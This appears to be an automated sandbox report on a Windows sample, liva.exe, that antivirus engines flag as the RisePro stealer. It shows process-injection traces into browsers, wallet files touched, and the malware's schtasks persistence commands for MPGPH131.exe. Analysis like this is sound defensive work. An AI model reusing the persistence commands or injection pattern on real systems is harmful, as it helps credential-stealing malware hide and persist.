parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\1pfa5s83.default-release\minidumps\c497e1ef-bec2-4cab-999c-911c20288065.dmp"
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=820,7906780280958915828,2294994613696492565,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1044 /prefetch:2
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xb0,0xb4,0xb8,0x84,0xbc,0x7fef2c86e00,0x7fef2c86e10,0x7fef2c86e20
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com

Appends a known multi-family ransomware file extension to files that have been encrypted (4 events)

file	C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet
file	C:\Users\test22\AppData\Roaming\MultiDoge\multidoge.wallet
file	C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\1pfa5s83.default-release\parent.lock
file	C:\Users\test22\AppData\Local\Temp\firefox\parent.lock

Resumed a suspended thread in a remote process potentially indicative of process injection (31 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2780 resumed a thread in remote process 2460
Process injection	Process 2780 resumed a thread in remote process 2616
Process injection	Process 2832 resumed a thread in remote process 2912
Process injection	Process 2616 resumed a thread in remote process 2512
Process injection	Process 2744 resumed a thread in remote process 2460
NtResumeThread Jan. 17, 2024, 8:06 a.m.	thread_handle: 0x000002d0 suspend_count: 1 process_identifier: 2460	1	0	0
NtResumeThread Jan. 17, 2024, 8:06 a.m.	thread_handle: 0x000002d0 suspend_count: 1 process_identifier: 2616	1	0	0
NtResumeThread Jan. 17, 2024, 8:05 a.m.	thread_handle: 0x00000340 suspend_count: 1 process_identifier: 2912	1	0	0
NtResumeThread Jan. 17, 2024, 7:58 a.m.	thread_handle: 0x0000000000000044 suspend_count: 1 process_identifier: 2512	1	0	0
NtResumeThread Jan. 17, 2024, 7:59 a.m.	thread_handle: 0x000000000000011c suspend_count: 2 process_identifier: 2460	1	0	0
NtResumeThread Jan. 17, 2024, 7:59 a.m.	thread_handle: 0x000000000000011c suspend_count: 2 process_identifier: 2460	1	0	0
NtResumeThread Jan. 17, 2024, 7:59 a.m.	thread_handle: 0x000000000000011c suspend_count: 2 process_identifier: 2460	1	0	0
NtResumeThread Jan. 17, 2024, 7:59 a.m.	thread_handle: 0x000000000000011c suspend_count: 2 process_identifier: 2460	1	0	0
NtResumeThread Jan. 17, 2024, 7:59 a.m.	thread_handle: 0x000000000000011c suspend_count: 2 process_identifier: 2460	1	0	0
NtResumeThread Jan. 17, 2024, 7:59 a.m.	thread_handle: 0x000000000000011c suspend_count: 2 process_identifier: 2460	1	0	0
NtResumeThread Jan. 17, 2024, 7:59 a.m.	thread_handle: 0x000000000000011c suspend_count: 2 process_identifier: 2460	1	0	0
NtResumeThread Jan. 17, 2024, 7:59 a.m.	thread_handle: 0x000000000000011c suspend_count: 2 process_identifier: 2460	1	0	0
NtResumeThread Jan. 17, 2024, 7:59 a.m.	thread_handle: 0x000000000000011c suspend_count: 2 process_identifier: 2460	1	0	0
NtResumeThread Jan. 17, 2024, 7:59 a.m.	thread_handle: 0x000000000000011c suspend_count: 2 process_identifier: 2460	1	0	0
NtResumeThread Jan. 17, 2024, 7:59 a.m.	thread_handle: 0x000000000000011c suspend_count: 2 process_identifier: 2460	1	0	0
NtResumeThread Jan. 17, 2024, 7:59 a.m.	thread_handle: 0x000000000000011c suspend_count: 2 process_identifier: 2460	1	0	0
NtResumeThread Jan. 17, 2024, 7:59 a.m.	thread_handle: 0x000000000000011c suspend_count: 2 process_identifier: 2460	1	0	0
NtResumeThread Jan. 17, 2024, 7:59 a.m.	thread_handle: 0x000000000000011c suspend_count: 2 process_identifier: 2460	1	0	0
NtResumeThread Jan. 17, 2024, 7:59 a.m.	thread_handle: 0x000000000000011c suspend_count: 2 process_identifier: 2460	1	0	0
NtResumeThread Jan. 17, 2024, 7:59 a.m.	thread_handle: 0x000000000000011c suspend_count: 2 process_identifier: 2460	1	0	0
NtResumeThread Jan. 17, 2024, 7:59 a.m.	thread_handle: 0x000000000000011c suspend_count: 2 process_identifier: 2460	1	0	0
NtResumeThread Jan. 17, 2024, 7:59 a.m.	thread_handle: 0x000000000000011c suspend_count: 2 process_identifier: 2460	1	0	0
NtResumeThread Jan. 17, 2024, 7:59 a.m.	thread_handle: 0x000000000000011c suspend_count: 2 process_identifier: 2460	1	0	0
NtResumeThread Jan. 17, 2024, 7:59 a.m.	thread_handle: 0x000000000000011c suspend_count: 2 process_identifier: 2460	1	0	0
NtResumeThread Jan. 17, 2024, 7:59 a.m.	thread_handle: 0x000000000000011c suspend_count: 2 process_identifier: 2460	1	0	0
NtResumeThread Jan. 17, 2024, 7:59 a.m.	thread_handle: 0x000000000000011c suspend_count: 2 process_identifier: 2460	1	0	0

Uses Sysinternals tools in order to add additional command line functionality (2 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

Executed a process and injected code into it, probably while unpacking (50 out of 97 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Jan. 17, 2024, 8:05 a.m.	thread_identifier: 2452 thread_handle: 0x000000f0 process_identifier: 2448 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000000e8	1	1
CreateProcessInternalW Jan. 17, 2024, 8:05 a.m.	thread_identifier: 2564 thread_handle: 0x000000f8 process_identifier: 2560 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000000f4	1	1
NtResumeThread Jan. 17, 2024, 8:05 a.m.	thread_handle: 0x00000170 suspend_count: 1 process_identifier: 840	1	0
CreateProcessInternalW Jan. 17, 2024, 8:05 a.m.	thread_identifier: 2728 thread_handle: 0x00000628 process_identifier: 2724 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4yn4sZHVEZHsgO filepath: C:\Users\test22\AppData\Local\Temp\jobA4yn4sZHVEZHsgO\HMY7P2elTJeLWFuUrZFu.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\jobA4yn4sZHVEZHsgO\HMY7P2elTJeLWFuUrZFu.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\jobA4yn4sZHVEZHsgO\HMY7P2elTJeLWFuUrZFu.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000062c	1	1
CreateProcessInternalW Jan. 17, 2024, 8:05 a.m.	thread_identifier: 2784 thread_handle: 0x0000062c process_identifier: 2780 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4yn4sZHVEZHsgO filepath: C:\Users\test22\AppData\Local\Temp\jobA4yn4sZHVEZHsgO\2hMM9txR1g67fgph3Nnz.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\jobA4yn4sZHVEZHsgO\2hMM9txR1g67fgph3Nnz.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\jobA4yn4sZHVEZHsgO\2hMM9txR1g67fgph3Nnz.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000634	1	1
CreateProcessInternalW Jan. 17, 2024, 8:05 a.m.	thread_identifier: 2836 thread_handle: 0x000001dc process_identifier: 2832 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4yn4sZHVEZHsgO filepath: C:\Program Files (x86)\Internet Explorer\iexplore.exe track: 1 command_line: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome filepath_r: C:\Program Files (x86)\Internet Explorer\iexplore.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000001e0	1	1
NtResumeThread Jan. 17, 2024, 8:06 a.m.	thread_handle: 0x00000270 suspend_count: 1 process_identifier: 2780	1	0
CreateProcessInternalW Jan. 17, 2024, 8:06 a.m.	thread_identifier: 2480 thread_handle: 0x000002d0 process_identifier: 2460 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4yn4sZHVEZHsgO filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://accounts.google.com filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002dc	1	1
NtResumeThread Jan. 17, 2024, 8:06 a.m.	thread_handle: 0x000002d0 suspend_count: 1 process_identifier: 2460	1	0
CreateProcessInternalW Jan. 17, 2024, 8:06 a.m.	thread_identifier: 2612 thread_handle: 0x000002d0 process_identifier: 2616 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4yn4sZHVEZHsgO filepath: C:\Program Files\Mozilla Firefox\firefox.exe track: 1 command_line: "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com filepath_r: C:\Program Files\Mozilla Firefox\firefox.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000012c	1	1
NtResumeThread Jan. 17, 2024, 8:06 a.m.	thread_handle: 0x000002d0 suspend_count: 1 process_identifier: 2616	1	0
NtResumeThread Jan. 17, 2024, 8:05 a.m.	thread_handle: 0x00000218 suspend_count: 1 process_identifier: 2832	1	0
CreateProcessInternalW Jan. 17, 2024, 8:05 a.m.	thread_identifier: 2916 thread_handle: 0x00000340 process_identifier: 2912 current_directory: filepath: track: 1 command_line: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2832 CREDAT:145409 filepath_r: stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000344	1	1
NtResumeThread Jan. 17, 2024, 8:05 a.m.	thread_handle: 0x00000340 suspend_count: 1 process_identifier: 2912	1	0
NtResumeThread Jan. 17, 2024, 8:05 a.m.	thread_handle: 0x00000418 suspend_count: 1 process_identifier: 2832	1	0
NtResumeThread Jan. 17, 2024, 8:05 a.m.	thread_handle: 0x00000294 suspend_count: 1 process_identifier: 2832	1	0
NtGetContextThread Jan. 17, 2024, 8:07 a.m.	thread_handle: 0x00000750	1	0
NtResumeThread Jan. 17, 2024, 8:05 a.m.	thread_handle: 0x000001fc suspend_count: 1 process_identifier: 2912	1	0
NtResumeThread Jan. 17, 2024, 8:05 a.m.	thread_handle: 0x00000230 suspend_count: 1 process_identifier: 2912	1	0
NtResumeThread Jan. 17, 2024, 8:05 a.m.	thread_handle: 0x00000244 suspend_count: 1 process_identifier: 2912	1	0
NtResumeThread Jan. 17, 2024, 8:05 a.m.	thread_handle: 0x0000081c suspend_count: 1 process_identifier: 2912	1	0
NtResumeThread Jan. 17, 2024, 7:58 a.m.	thread_handle: 0x0000000000000078 suspend_count: 1 process_identifier: 2460	1	0
CreateProcessInternalW Jan. 17, 2024, 7:58 a.m.	thread_identifier: 2752 thread_handle: 0x00000000000000c0 process_identifier: 2744 current_directory: filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xb0,0xb4,0xb8,0x84,0xbc,0x7fef2c86e00,0x7fef2c86e10,0x7fef2c86e20 filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000000000000c4	1	1
CreateProcessInternalW Jan. 17, 2024, 7:59 a.m.	thread_identifier: 2812 thread_handle: 0x0000000000000548 process_identifier: 2800 current_directory: filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=820,7906780280958915828,2294994613696492565,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1044 /prefetch:2 filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 17302540 (CREATE_BREAKAWAY_FROM_JOB\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|DETACHED_PROCESS\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000000000054c	1	1
CreateProcessInternalW Jan. 17, 2024, 7:58 a.m.	thread_identifier: 2500 thread_handle: 0x0000000000000044 process_identifier: 2512 current_directory: filepath: C:\Program Files\Mozilla Firefox\firefox.exe track: 1 command_line: "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com filepath_r: C:\Program Files\Mozilla Firefox\firefox.exe stack_pivoted: 0 creation_flags: 1028 (CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT) inherit_handles: 0 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Jan. 17, 2024, 7:58 a.m.	buffer: base_address: 0x000000013fa722b0 process_identifier: 2512 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Jan. 17, 2024, 7:58 a.m.	buffer: base_address: 0x000000013fa80d88 process_identifier: 2512 process_handle: 0x000000000000004c	1	1
NtMapViewOfSection Jan. 17, 2024, 7:58 a.m.	section_handle: 0x0000000000000060 process_identifier: 2512 commit_size: 0 win32_protect: 32 (PAGE_EXECUTE_READ) buffer: base_address: 0x000000000e1e0000 allocation_type: 0 () section_offset: 0 view_size: 65536 process_handle: 0x0000000000000050	1	0
NtAllocateVirtualMemory Jan. 17, 2024, 7:58 a.m.	process_identifier: 2512 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x000000000e1e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0x0000000000000050	1	0
WriteProcessMemory Jan. 17, 2024, 7:58 a.m.	buffer: I»`#¤?Aÿã base_address: 0x0000000077711590 process_identifier: 2512 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Jan. 17, 2024, 7:58 a.m.	buffer: base_address: 0x000000013fa80d78 process_identifier: 2512 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Jan. 17, 2024, 7:58 a.m.	buffer: I» ¤?Aÿã base_address: 0x00000000776e7a90 process_identifier: 2512 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Jan. 17, 2024, 7:58 a.m.	buffer: base_address: 0x000000013fa80d70 process_identifier: 2512 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Jan. 17, 2024, 7:58 a.m.	buffer: ÏT base_address: 0x000000013fa20108 process_identifier: 2512 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Jan. 17, 2024, 7:58 a.m.	buffer: qw@qw qw@qwqw°qw nwàTnw 3qwqwÀ´lw`,qwÀowömw Yqw2qwVqw°wwnwRqw nwQqwÂnw ?owPnw°TnwàtnwðowÐ1qwmwÐOmw`êpwÐæpwÐæpwÐ.qw base_address: 0x000000013fa7aae8 process_identifier: 2512 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Jan. 17, 2024, 7:58 a.m.	buffer: base_address: 0x000000013fa80c78 process_identifier: 2512 process_handle: 0x000000000000004c	1	1
NtResumeThread Jan. 17, 2024, 7:58 a.m.	thread_handle: 0x0000000000000044 suspend_count: 1 process_identifier: 2512	1	0
NtResumeThread Jan. 17, 2024, 7:58 a.m.	thread_handle: 0x00000000000000f4 suspend_count: 1 process_identifier: 2744	1	0
NtGetContextThread Jan. 17, 2024, 7:59 a.m.	thread_handle: 0x000000000000011c	1	0
NtResumeThread Jan. 17, 2024, 7:59 a.m.	thread_handle: 0x000000000000011c suspend_count: 2 process_identifier: 2460	1	0
NtGetContextThread Jan. 17, 2024, 7:59 a.m.	thread_handle: 0x000000000000011c	1	0
NtResumeThread Jan. 17, 2024, 7:59 a.m.	thread_handle: 0x000000000000011c suspend_count: 2 process_identifier: 2460	1	0
NtGetContextThread Jan. 17, 2024, 7:59 a.m.	thread_handle: 0x000000000000011c	1	0
NtResumeThread Jan. 17, 2024, 7:59 a.m.	thread_handle: 0x000000000000011c suspend_count: 2 process_identifier: 2460	1	0
NtGetContextThread Jan. 17, 2024, 7:59 a.m.	thread_handle: 0x000000000000011c	1	0
NtResumeThread Jan. 17, 2024, 7:59 a.m.	thread_handle: 0x000000000000011c suspend_count: 2 process_identifier: 2460	1	0
NtGetContextThread Jan. 17, 2024, 7:59 a.m.	thread_handle: 0x000000000000011c	1	0
NtResumeThread Jan. 17, 2024, 7:59 a.m.	thread_handle: 0x000000000000011c suspend_count: 2 process_identifier: 2460	1	0
NtGetContextThread Jan. 17, 2024, 7:59 a.m.	thread_handle: 0x000000000000011c	1	0
NtResumeThread Jan. 17, 2024, 7:59 a.m.	thread_handle: 0x000000000000011c suspend_count: 2 process_identifier: 2460	1	0

File has been identified by 45 AntiVirus engines on VirusTotal as malicious (45 events)

Bkav	W32.AIDetectMalware
Lionic	Trojan.Win32.RisePro.i!c
Elastic	Windows.Generic.Threat
Cynet	Malicious (score: 100)
Skyhigh	BehavesLike.Win32.TrojanAitInject.th
McAfee	GenericRXAA-AA!FB987F700ECA
Cylance	unsafe
VIPRE	Gen:Variant.Zusy.532019
Sangfor	Infostealer.Win32.Agent.V7oa
K7AntiVirus	Trojan ( 005969e31 )
BitDefender	Gen:Variant.Zusy.532019
K7GW	Trojan ( 005969e31 )
Cybereason	malicious.22298b
Arcabit	Trojan.Zusy.D81E33
VirIT	Trojan.Win32.Genus.UWC
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win32/Agent.ADVG
Avast	Win32:TrojanX-gen [Trj]
Kaspersky	HEUR:Trojan-PSW.Win32.RisePro.gen
Alibaba	TrojanPSW:Win32/RiseProStealer.8ce07033
NANO-Antivirus	Trojan.Win32.RisePro.kgujrs
MicroWorld-eScan	Gen:Variant.Zusy.532019
Rising	Downloader.Agent!1.D93C (CLASSIC)
Emsisoft	Gen:Variant.Zusy.532019 (B)
F-Secure	Trojan.TR/AD.Nekark.hegsr
DrWeb	Trojan.Siggen23.22903
Sophos	Mal/Generic-S
Avira	TR/AD.Nekark.hegsr
Antiy-AVL	Trojan/Win32.RiseProStealer
Gridinsoft	Trojan.Win32.Agent.dd!s1
Microsoft	Trojan:Win32/RiseProStealer.AC!MTB
ZoneAlarm	HEUR:Trojan-PSW.Win32.RisePro.gen
GData	Win32.Trojan-Stealer.RisePro.C
AhnLab-V3	Trojan/Win.Generic.R630829
BitDefenderTheta	Gen:NN.ZexaF.36680.Cv0@ayCdv2gk
DeepInstinct	MALICIOUS
VBA32	TrojanPSW.RisePro
Malwarebytes	Malware.AI.667579570
Panda	Trj/GdSda.A
Tencent	Malware.Win32.Gencirc.10bf8104
SentinelOne	Static AI - Suspicious PE
MaxSecure	Trojan.Malware.196579936.susgen
Fortinet	W32/Agent.ADVG!tr
AVG	Win32:TrojanX-gen [Trj]
CrowdStrike	win/malicious_confidence_70% (W)

liva.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All